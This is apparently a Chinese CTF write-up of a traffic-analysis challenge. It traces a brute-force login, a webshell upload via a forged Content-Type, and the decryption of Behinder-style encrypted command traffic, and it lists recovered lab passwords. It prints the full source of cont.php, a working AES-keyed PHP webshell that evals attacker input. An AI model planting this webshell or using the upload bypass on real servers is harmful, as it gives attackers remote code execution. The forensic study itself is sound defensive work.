首页 > 其他分享 >龙信杯流量分析

龙信杯流量分析

时间:2024-10-30 09:21:14浏览次数:1  
标签:分析 流量 龙信杯 192.168 格式 php 包检材

龙信杯流量分析

分析流量包检材,给出管理员对web环境进行管理的工具名。(标准格式:小皮)

使用流量分析工具CTF-NetA,查找到宝塔流量的域名

image-20241029193926822

筛选DNS,wireshark也有相关记录

image-20241029194122684

bt

分析流量包检材,给出攻击者的ip地址是多少。(标准格式:127.0.0.1)

使用CTF-NetA,筛选出交流最多的IP

image-20241029193752071

wireshark对于连接有记录,打开统计下的Endpoints

image-20241029194312701

因为爆破的原理就是发送大量的爆破报文去尝试破解密码,所以在端点界面中点击packets,使得排序方式为从大到小排序。就可以在该图中得知192.168.209.135为发起爆破的主机,192.168.209.147为被爆破的主机

image-20241029194232253

192.168.209.135

分析流量包检材,给出攻击者爆破出的网站非管理员用户名是。(标准格式:admin)

在返回包中找信息(192.168.209.147——>192.168.209.135)

定位16502数据包,在返回内容中找到saber和luna用户

image-20241029194942556

也可以用tcp追踪流看

image-20241029195205404

后面发现saber用户登录过管理员后台,属于管理员权限,所以答案为luna

image-20241029195444676

luna

分析流量包检材,攻击者进行目录扫描得到的具有后门的页面url路径为。(标准格式:/abc.html)

一般利用点都在流量包的最后面,排序一下找到上传点

image-20241029195759579

/up_load.php

分析流量包检材,攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。(标准格式:test-type)

后面一连串的都是连接cont.php,怀疑是连接的webshell,这个问题应该是在问上传这个木马文件时修改了什么参数。常见的有上传图片木马,将图片上传后,bp抓包改content-type,而这题答案就是这个

image-20241029200749592

找到修改点

image-20241029201408944

content-type

分析流量包检材,攻击者上传成功的恶意文件, 该文件的临时存放路径是。(标准格式:/abc/edf)

就在上面一题的界面最底下

image-20241029203033587

/tmp/php38mbeJ

分析流量包检材,服务器php配置文件的存放位置(标准格式:/www/sev/php.ini)

由上一题的数据包可知cont.php的代码内容——AES加密

<?php
@error_reporting(0);
session_start();
​	$key="e45e329feb5d925b";
​	$_SESSION['k']=$key;
​	session_write_close();
​	$post=file_get_contents("php://input");
​	if(!extension_loaded('openssl'))
​	{
​		$t="base64_"."decode";
​		$post=$t($post."");​		
​		for($i=0;$i<strlen($post);$i++) {
​    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
​    			}
​	}
​	else
​	{
​		$post=openssl_decrypt($post, "AES128", $key);
​	}
​    $arr=explode('|',$post);
​    $func=$arr[0];
​    $params=$arr[1];
​	class C{public function __invoke($p) {eval($p."");}}
​    @call_user_func(new C(),$params);
?>

找到流量包,可以看出符合冰蝎的流量特征(Content-type: Application/x-www-form-urlencoded),所以后面进行aes+base64的解密

原理可以参考:

1.冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户

2.冰蝎-特征检测及报文解密-腾讯云开发者社区-腾讯云 (tencent.com)

img

进行常规解密

AES批量加密解密 - 在线工具 (bugscaner.com)

image-20241030084244925

注意要复制括号里面的内容

Base64 编码/解码 - 锤子在线工具 (toolhelper.cn)

方框内就是执行的cmd,可以确定配置文件存放路径

image-20241030084721598

image-20241030084753160

/www/wwwroot/192.168.209.147/wp-config.php

分析流量包检材,被攻击的web环境其数据库密码是。(标准格式:qwer1234)

和上题一样,命令执行后服务器会返回数据包,所以要看返回的流量—— 分组 20299

image-20241030090043941

这些流量和上面操作一样,进行解密

image-20241030090219403

X847Z3QzF1a6MHjR

分析流量包检材,服务器管理存放临时登录密码的位置。(标准格式:/tmp/pass)

在612流中,发现了其正在查看一个tmppass文件

Clip_2024-09-30_13-48-17

image-20241030091625997

/tmp/tmppass

分析流量包检材,黑客获取的高权限主机的登录密码。(标准格式:qwer1234)

查看上一题返回值,解密流程和上面一样

image-20241030092300467

image-20241030092326144

passwd!@#

标签:分析,流量,龙信杯,192.168,格式,php,包检材
From: https://www.cnblogs.com/yanke-wolf/p/18515018

相关文章

  • 【Python原创毕设|课设】基于Python Flask IT行业招聘可视化分析系统-文末附下载方式,
    基于PythonFlask物流行业招聘可视化分析系统(获取方式访问文末官网)一、项目简介二、开发环境三、项目技术四、功能结构五、运行截图六、数据库设计七、功能实现八、源码获取一、项目简介本系统是一款基于PythonFlask的IT行业招聘可视化分析平台,旨在为行业用户提供......
  • GPU 学习笔记三:GPU多机多卡组网和拓扑结构分析(基于数据中心分析)
    文章目录一、概述二、数据中心(DC)2.1数据中心简介2.2传统数据中心的网络模型2.3脊叶网络模型(Spine-Leaf)2.4Facebook的Fabric网络架构三、基于数据中心的多机多卡拓扑3.1Spine-Leaf架构网络规模测算方法3.2NVIDIA多机多卡组网防止遗忘和后续翻找的麻烦,记录下平......
  • 深入浅出:SpringBoot启动流程源码分析(持续更新中......)最新日期:2024年10月29日
    Hello,大家好,我是此林。今天来深入底层讲一讲SpringBoot是如何启动的,也就是我们单击运行SpringBoot启动类,它底层发生了什么?SpringBoot启动类很简单,只有一行代码。我们点进run()方法。我们发现,它底层其实进行了两步操作。第一步是new出一个SpringApplication对象,第二个是......
  • XSS案例分析和规避
    1.什么是XSS跨站脚本(XSS)是一种安全漏洞,允许攻击者向网站注入恶意客户端代码。该代码由受害者执行从而让攻击者绕过访问控制并冒充用户。XSS可能导致cookie、token等用户敏感信息被窃取,或者HTML被重写。下面是一个极简易的新闻发布功能的案例,前端获取用户输入的标题和新闻内容,服......
  • 用Python将 UE5内存分析日志 提取到Excel表
            上篇文章我们已经实现了 “使用Python批量提取文本中,当某一行存在 “×××××”时获取这一行文字,并将所有提取的内容按顺序保存到一个新的文件中”。而后来我发现这个功能已经不能满足我的需求了,所以本次我们将重新对一个更复杂文件的内容进行批量提......
  • 复杂度分析,数据结构的数组与链表
    复杂度分析,数据结构的数组与链表参考书籍:Hello算法目录复杂度分析,数据结构的数组与链表复杂度分析时间复杂度空间复杂度数据结构数组与链表数组链表列表复杂度分析复杂度分析是用来判断一个算法效率的手段,执行时所需的时间和空间资源则是正好对应时间和空间复杂度。考虑到执......
  • TikTok流量池分发机制:我们该如何提升账号流量?
    TikTok的流量池通过算法分析用户的观看习惯和互动行为,智能地将内容分发给潜在感兴趣的观众。新发布的视频会先在小范围内测试,如果获得较高的观看和互动率,便会逐渐向更广泛的用户群体推广。那么具体的TikTok流量池分发机制是什么样子的呢?我们又该如何提升TikTok的流量?让我们一起......
  • 如何利用chatGPT快速完成SCI论文与项目撰写、科研应用、数据分析、AI绘图
    2022年11月30日,可能将成为一个改变人类历史的日子——美国人工智能开发机构OpenAI推出了聊天机器人ChatGPT3.5,将人工智能的发展推向了一个新的高度。2023年4月,更强版本的ChatGPT4.0上线,文本、语音、图像等多模态交互方式使其在各行各业的应用呈现了更多的可能性。2023年11月7日......
  • 基于Python星载气溶胶数据处理与反演分析
    Python作为一种强大且易于学习的编程语言,已广泛应用于数据科学和大气科学领域,Python凭借其强大的数据处理能力,可以高效处理海量的气溶胶数据。例如,通过Pandas库,研究人员可以进行高效的数据清洗、整理和分析;NumPy库则提供了强大的数值计算功能,能够快速进行各种数学和统计运算;Car......
  • 【APP测试】ADB安装、常用命令、monkey的使用及日志分析
    前言原生和混合在市场上区分原生、混合开发原生:是区分安卓(Andriod)和IOS(C语言)。1.一个app有两套代码,两个不同的岗位去完成的。2.性能会更好、兼容性也会好3.开发成本高、时间慢混合:原生+H5。一般可以实现一套代码生成安卓版本和iOS版......